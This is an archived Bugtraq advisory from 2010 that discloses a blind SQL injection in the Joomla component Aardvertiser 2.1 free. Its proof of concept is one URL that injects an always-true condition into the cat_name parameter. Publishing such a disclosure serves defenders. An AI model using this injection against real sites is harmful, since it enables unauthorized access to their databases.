[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability
From: sattler@xxxxxxxxxxxxx
Date: Tue, 7 Sep 2010 10:48:40 -0600

# Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection 
Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // www.solidmedia.de
# Software Link: 
http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download
# Version: 2.1 free


[ Vulnerability//PoC ]

http://www.site.com/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view

Prev by Date: [SECURITY] [DSA 2098-2] New typo3-src packages fix regression
Next by Date: Call for Participation - GameSec 2010 - Berlin, Germany
Previous by thread: [SECURITY] [DSA 2098-2] New typo3-src packages fix regression
Next by thread: Call for Participation - GameSec 2010 - Berlin, Germany
Index(es):
- Date
- Thread